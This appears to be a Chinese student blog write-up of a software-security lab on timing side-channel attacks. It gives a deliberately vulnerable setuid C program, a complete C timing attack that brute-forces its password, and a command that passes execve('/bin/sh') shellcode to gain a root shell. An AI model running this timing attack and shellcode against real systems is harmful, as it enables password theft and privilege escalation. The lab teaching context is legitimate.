软件安全实验——lab10(一、基于时间的侧信道攻击)

最新推荐文章于 2024-04-07 22:09:59 发布
最新推荐文章于 2024-04-07 22:09:59 发布
阅读量1.1k 收藏 4
点赞数 4
分类专栏: # 软件安全实验 文章标签: c语言 字符串 linux 堆栈 侧信道攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/119700160
版权

目录标题


边信道攻击实验:
  通过使用下面所提供的漏洞代码,设计一个攻击代码,利用边信道攻击的方式获取正确的密码,并执行后面的 shellcode 来获取一个 root shell,其中的s.pass 为 root 只读的密码文件。过程如下:

(1)漏洞代码:

//sidechannel.c
//s.pass root 只读
//S1deCh4nnelAttack3r
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
	 FILE *in = 0;
	 char pass[20]="";
	 unsigned int i=0, j=0;
	 unsigned short correct=0,misplaced=0;
	 unsigned short pwlen=strlen(pass) - 1, inlen=0;
	 if(argc != 3 || (inlen=strlen(argv[1]) - 1) > 19)
	 return 1;
	 setresuid(geteuid(),geteuid(),geteuid());
	 in = fopen("s.pass","r");
	 pass[fread(pass, 1,19,in)] = 0;
	 fclose(in);
	 for (i = 0; i <= inlen && i <= pwlen; i++)
	 if(pass[i] == argv[1][i])
	 correct++;
	 else
	 for(j = 1; j < pwlen; j++)
	 if(argv[1][i] == pass[(i+j)%19])
	 misplaced++;
	 if(correct == 19)
		 把argv[2]指针强制类型转换成函数指针void (*)(),然后执行函数argv[2]();
		 ((void (*)()) argv[2])();
	 return 0;
}

  分析上述代码可知,判断输入的字符串和密码文件读取的字符串是否相等,它是逐个字符判断,如果当前字符和密码字符相等,旧执行一次指令;而如果不相等,就会执行pwlen次指令,而pwlen是一个溢出的很大的数0xffff(65535),所以会导致密码字符正确时程序执行时间比较短,密码字符错误时程序执行时间比较长。通过暴力破解判断输入所有不同的字符,对不同密码字符的程序执行时间长短进行比较,我们认为在每个位置上让程序执行时间最短的那个字符就是正确的密码字符,就可以获得正确密码。

(2)将密码文件s.pass设为root只读:

# chown root:root s.pass

在这里插入图片描述

(3)攻击代码为:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
int main()
{
	//所有的字符,包括数字和大小写字母
	char character[] = { '0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z' };
	//存储计算出的最后的密码字符串
	char result[19] = "";
	//当前字符
	//进程ID
	pid_t pid;
	//struct timeval有两个成员,一个是秒tv_sec,一个是微秒tv_usec
	struct timeval startTime,endTime;
	//每个字符运行程序所使用的时间/微秒
	long int tempTime = 0;
	//每个字符运行程序10次所使用的时间/微秒,用它来求平均值作为当前字符所使用的时间
	long int totalTime = 0;
	//每个字符运行程序的平均时间
	float averageTime = 0;
	//所使用的最少时间/微秒
	float minimumTime = 10000000;
	//所使用的最少时间对应的字符下标
	int minimumTimeLab = 0;
	int i,j,k;
	//对长度为19的字符串逐个破解
	for (i = 0; i < 19; i++)
	{
		//前18个密码字符
		if(i != 18 ){
			//所使用的最少时间为10000000微秒
			minimumTime = 10000000;
		}else{
			//需要计算最大时间,先初始化为0
			minimumTime = 0;
		}
		
		//每个位置上对63个字符逐个计算
		for (j = 0; j < 63; j++){
			//初始化每个字符运行程序10次所使用的时间为0
			totalTime = 0;
			//进行10轮循环取运行时间的平均值,减小偶然结果的影响
			for (k = 0; k < 10; k++)
			{
				//62个字符中的一个放在当前位置
				result[i] = character[j];
				//获取微秒级的系统当前时间,运行命令前的时间
				gettimeofday(&startTime,NULL);
				//在子进程中fork()返回0
				if ((pid = fork()) == 0) {
					//执行程序路径./sidechannel,要执行命令名sidechannel,参数result和"0",空指针(char *)0代表NULL参数结束结束
					execl("./sidechannel", "sidechannel", result, "0", (char *)0);
				}
				//在父进程中fork()返回创建新子进程的ID
				else {
					//等待新子进程结束,NULL不使用结束状态值,0不使用额外状态选项
					waitpid(pid, NULL, 0);
				}
				//获取微秒级的系统当前时间,运行命令后的时间
				gettimeofday(&endTime,NULL);
				//计算单次程序运行使用的秒和毫秒
				tempTime = (endTime.tv_sec - startTime.tv_sec) * 1000000 + (endTime.tv_usec - startTime.tv_usec);
				//加上单次程序运行使用的时间
				totalTime += tempTime;
			}
			averageTime = totalTime / 10 ;
			//前18个密码字符
			if(i != 18 ){
				//每个字符运行程序的平均时间最小的,作为正确的密码字符
				if(averageTime < minimumTime){
					//记录最小时间
					minimumTime = averageTime;
					//记录最小时间对应的字符下标
					minimumTimeLab = j;
				}
			//第19个密码字符
			}else{
				//每个字符运行程序的平均时间最大的,作为正确的密码字符
				if(averageTime > minimumTime){
					//记录最大时间
					minimumTime = averageTime;
					//记录最大时间对应的字符下标
					minimumTimeLab = j;
				}
			}
		}
		//把所使用的最少时间对应的字符,赋值给密码字符串
		result[i] = character[minimumTimeLab];
		printf("%s\n", result);
	}
	return 0;

}
其中

struct timeval {
time_t tv_sec; // seconds
long tv_usec; // microseconds
};

  struct timeval有两个成员,一个是秒,一个是微秒, 所以最高精确度是微秒。
  因为计算的时间是微秒级要求比较精准,在实验过程中,电脑运行的进程、磁盘的占用率过高可能会影响程序的运行的运行时间,从而可能导致某个时间某个字符的运行时间不够精准,所以尽量用性能比较好的电脑和后台程序尽量减少来运行程序,得到的结果都是比较精准的。
在这里插入图片描述
  多次运行,大概5秒钟就能找到正确的密码,后台程序比较少计时比较准确的时候密码的正确率基本是100%。
  找到正确密码之后,只需要运行漏洞程序,第一个参数为正确密码,第二个参数为shellcode,漏洞程序在调用参数2的函数指针时就会执行 shellcode,从而获得一个 root shell。

(4)可执行栈-z execstack选项:

提权编译程序的时候都要打开可执行栈-z execstack选项:

gcc -z execstack -o  sidechannel sidechannel.c

  不然就会发生段错误,因为执行shellcode就是利用栈的漏洞执行提权代码,如果不打开-z execstack选项的话栈不可执行,就会发生段错误,无法执行shellcode提权获得root权限。错误的截图如下所示:
在这里插入图片描述

(5)设置sidechannel文件的权限:

# chmod root.root sidechannel
# chmod 4755 sidechannel

  设置sidechannel文件root所属,4表示其他用户(seed)执行文件时,具有与所有者(root)相当的权限,不然就只能获得普通用户权限
在这里插入图片描述

(6)只有完成上面的步骤开始攻击:

./sidechannel S1deCh4nnelAttack3r $(python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'")

在这里插入图片描述

大灬白
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究-RSA密码核时间信道检测与量化分析.pdf
09-08
攻击者通过RSA时间信道可有效破解其密钥。但目前缺乏有效的方法检测和评估RSA硬件密码核时间信道信息泄漏。针对此问题,利用门级信息流追踪方法检测RSA时间信道;提出一种测试框架对密钥位泄露进行定性检测和定量分析。通过对五种不同RSA密码硬件体系结构进行案例研究,实验结果显示,所提方法可有效评估和验证迁移技术对RSA时间信道信息泄露的影响。该测试方法可有效辅助硬件设计人员权衡时间信道安全性、硬件资源消耗和性能等指标。
HIT哈工大软件构造实验lab2
06-17
实验Lab2是软件构造课程的一个重要实验,旨在加深学生对抽象数据类型和面向对象编程的理解。通过完成实验,学生可以掌握抽象数据类型和面向对象编程的知识点,并掌握Java语言和Git版本控制系统的使用。
如何发现防不胜防的边信道攻击
weixin_34343308的博客
07-10 372
反病毒软件捕捉不到Rowhammer及类似边信道攻击,于是,一组美国科学家着手研究该怎样捕获这些攻击的特征。 一旦考虑到实验室环境和间谍工具之类的东西,边信道攻击就是很具体的事儿了。举个例子,Rowhammer攻击。这是一个通过快速重写RAM行,以纯软件方式翻转RAM上邻近存储单元的攻击方法。最终,Rowhammer能使攻击者搞崩内核进程,获取到root...
信道攻击
最新发布
m0_73146715的博客
04-07 785
信道攻击的三种类型(功率分析攻击、电磁分析攻击时间分析攻击)在应对方式上存在一些共同点和不同点。以下是它们的共同点和不同点的总结:共同点:1. 使用安全的设计和实现:所有类型的信道攻击都需要在设计密码系统和硬件实现时考虑这些攻击的风险,并采取措施减少这些风险。2. 物理隔离:为了减少对信道分析的干扰,所有类型的信道攻击都可能需要物理隔离密码模块与其他电路。3. 随机化:在密码操作中引入随机化的元素,如功率消耗、时间延迟等,以增加攻击分析的难度。
漏洞挖掘——实验11 信道攻击+TCP/IP实验
一半西瓜的博客
04-17 5415
题目 Lab 信道攻击 + TCP/IP实验 Pre 1、用IE访问某些网站的时候,输入javascript:alert(document.cookie)会有什么反应,解释原因。 2、阅读下面两篇文章或者阅读一本书<<JavaScript DOM编程艺术>>: Javascript Tutorial https://www.evl.uic.edu/luc/bv...
Mastik:微体系结构信道攻击工具包
分享观点和经验,欢迎交流。
08-17 748
1. 引言 微体系结构通道攻击利用了处理器内部组件的竞争,从而泄漏了进程之间的信息。虽然从理论上讲这类攻击很简单,但实际的实现方式往往很复杂,并且需要对文献记载不充分的处理器函数和其他领域专有的知识有充分的了解。因此,进入微体系结构通道攻击的工作存在障碍,这阻碍了该领域的发展以及现有软件抵御此类攻击的能力的分析。 本文介绍 Mastik,一个用于测试微体系结构通道攻击的工具包。Mastik旨在提供已发布的攻击分析技术的实现。在撰写本文时,Mastik尚处于 开发的早期阶段。0.02版的代号 “Aye
密码信道分析实验-计时工攻击
qq_52398998的博客
03-04 1469
密码信道分析—计时攻击模拟实验
HIT哈工大软件构造实验lab3
06-17
软件构造实验Lab 3中,实验目标是设计一个面向复用和可维护性的软件系统,通过三个应用场景的设计,实现 PlanningEntry<R> 的设计和实现。 实验环境配置 实验环境配置是指在实验过程中所需的软硬件环境的配置,...
基于C语言实现的MallocLab实验.zip
07-04
本质是对一系列的 malloc,free 请求队列的相应,同时满足一些特定的限制条件,比如说:不可以控制用户请求空间的大小;用户的请求必须立即响应,不可以使用 buffer 的形式,这一点是和 shedlab 本质的区别;只可以...
计算机网络安全实验——arp欺骗..doc
06-07
《计算机网络安全实验报告 实验名称: arp欺骗 提交报告时间: 年 月 日 1. 实验目的 程序实现ARP欺骗,对ARP欺骗进行进一步的认识并提出防范措施。 2. 系统环境 主机1 windows系统 主机2 windows系统 主机3 linux...
哈工大hit软件构造lab4实验报告
07-06
哈工大hit软件构造lab4实验报告 仅供参考
虚拟化:信道攻击案例
virtualization_的博客
10-13 617
具体实例:一个真实的在线医疗系统 在线医疗是一个很私人的信息服务系统,它由信誉最好的企业研发,并且在数据传输的过程中采用了HTTPS协议对用户的信息进行了加密传输。一旦登陆,用户可以建立自己的健康档案,包括症状、用药、疗程等内容,甚至还可以寻找医生。在研究中发现,入侵者可以完全可以推断出一个用户服用的药物,疗程以及他寻找的医生的类型。 如上图所示,是该医疗系统的添加病例的页面。此时用户所选择的是症状标签,用户可以在这个界面中键入自己的症状,在键入的过程中,系统会帮助用户弹出一个小的提示窗口。对于其他的用药
关于信道攻击
热门推荐
weixin_46661122的博客
11-17 1万+
信道攻击——是一种利用计算机不经意间释放出的信息信号(如功耗,电磁辐射,电脑硬件运行声)来进行破译的攻击模式:例如,黑客可以通过计算机显示屏或硬盘驱动器所产生的电磁辐射,来读取你所显示的画面和磁盘内的文件信息;或是,通过计算机组件在执行某些程序时需要消耗不同的电量,来监控你的电脑;亦或是,仅通过键盘的敲击声就能知道你的账号和密码。 2017年一段昆明小学生“听声音”徒手解开ofo共享单车密码锁的视频流传于网络,视频中该小学生通过不断扭动密码盘来尝试解锁,仅用17秒便成功解开了车锁,这种是通过声音信号的.
RSA时间信道攻击技术
JeremyLi的博客
10-07 493
自学用
信道攻击介绍
baron-周贺贺-代码改变世界ctw
08-28 445
具体说,我们要使用已知的明文或者密文对加密算法的一个步骤进行匹配(也可以说成只针对一个步骤的密钥的爆破),因此即使泄露较小,也可以有效识别,有天然的对噪音的过滤,缺点是需要的能量轨迹很多(DPA的基本想法就是,通过大量的能量轨迹计算能量轨迹和数据的依赖性)。最长使用的是功耗信道攻击,功耗信息中存储的信息较多,硬件进行加密的时候,会产生一定的功耗,加密过程中功耗信息是连续的,对于友好的加密硬件可以看清楚加密的过程。基于功率分析信道攻击的信息恢复,主要有简单功率攻击、差分功率攻击、相关功率分析等。
信道攻击实验四 AES CPA 攻击
Reaper_MXBG的博客
12-26 1万+
带有AES能量迹数据集的CPA仿真实验
【pwn】记一道shellcode信道攻击
woodwhale的博客
10-16 4696
【pwn】记一道shellcode信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是信道攻击
Packet Chasing:通过缓存信道监视网络数据包
分享观点和经验,欢迎交流。
08-19 979
摘要 本文介绍了一种对网络的攻击–Packet Chasing,这种攻击不需要访问网络,无论接收数据包的进程的特权级别如何,都能发挥作用。一个间谍进程可以很容易地探测和发现网络驱动程序使用的每个缓冲区的确切缓存位置。更有用的是,它可以发现这些缓冲区用于接收数据包的确切顺序。这样就可以通过缓存信道监控数据包频率和数据包大小。该攻击既可以在发送者和无法访问网络的远程间谍程序之间建立秘密通道,也可以进行直接攻击,识别网络上受害者的网页访问模式等。除了识别潜在的攻击外,本工作还提出了一种基于软件的短期缓解措施,以
Linux检查保护机制,Linux ELF可执行文档保护机制
weixin_34049581的博客
05-13 533
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?对于Linux操作系统上ELF可执行文档的保护机制的介绍。1.概述现代操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制。各种安全选择的gcc编译参数如下:NX:-z ex...
计算机系统基础实验介绍(Lab3)-20191
08-03
"计算机系统基础实验-Lab3-20191主要关注缓冲区溢出攻击,旨在通过实验加深学生对IA-32函数调用规则和栈结构的理解。实验涉及一个名为`bufbomb`的可执行程序,学生需要进行一系列缓冲区溢出尝试,以改变程序的内存...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值